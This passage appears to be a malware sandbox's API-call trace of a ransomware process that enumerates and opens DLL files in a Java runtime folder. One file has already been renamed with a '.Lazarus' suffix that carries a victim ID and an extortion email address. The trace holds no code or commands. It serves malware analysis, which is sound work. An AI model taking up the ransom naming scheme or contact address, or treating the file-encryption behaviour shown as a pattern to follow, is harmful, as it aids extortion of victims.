Files\\Java\\jre1.8.0_144\\bin\\awt.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\awt.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0090.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x899e0 | out: hHeap=0x20000) returned 1 [0090.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0090.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0090.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d720 | out: hHeap=0x20000) returned 1 [0090.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0090.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.219] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4240, dwReserved0=0xd8de8301, dwReserved1=0xbc6b70bc, cFileName="bci.dll", cAlternateFileName="")) returned 1 [0090.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0090.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0090.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0090.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0090.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0090.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0090.219] AreFileApisANSI () returned 1 [0090.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll", lpUsedDefaultChar=0x0) returned 47 [0090.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0090.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0090.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0090.220] AreFileApisANSI () returned 1 [0090.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0090.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a98 [0090.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 47 [0090.220] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.221] GetFileType (hFile=0x360) returned 0x1 [0090.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0090.221] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0090.221] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0090.221] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0090.221] CloseHandle (hObject=0x360) returned 1 [0090.221] AreFileApisANSI () returned 1 [0090.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0090.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a98 [0090.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 47 [0090.222] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.222] GetFileType (hFile=0x360) returned 0x1 [0090.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0090.222] CloseHandle (hObject=0x360) returned 1 [0090.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0090.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0090.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.222] AreFileApisANSI () returned 1 [0090.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0090.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71688 [0090.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 47 [0090.222] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\bci.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4240)) returned 1 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0090.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.223] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="dcpr.dll", cAlternateFileName="")) returned 1 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0090.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0090.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.224] AreFileApisANSI () returned 1 [0090.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll", lpUsedDefaultChar=0x0) returned 48 [0090.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0090.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0090.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0090.224] AreFileApisANSI () returned 1 [0090.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0090.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0090.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 48 [0090.224] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.224] GetFileType (hFile=0x360) returned 0x1 [0090.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0090.224] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0090.225] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0090.225] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0090.225] CloseHandle (hObject=0x360) returned 1 [0090.225] AreFileApisANSI () returned 1 [0090.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0090.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0090.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 48 [0090.225] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.225] GetFileType (hFile=0x360) returned 0x1 [0090.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0090.225] CloseHandle (hObject=0x360) returned 1 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0090.226] AreFileApisANSI () returned 1 [0090.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0090.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll") returned 48 [0090.227] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dcpr.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27040)) returned 1 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0090.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.227] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="decora_sse.dll", cAlternateFileName="DECORA~1.DLL")) returned 1 [0090.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 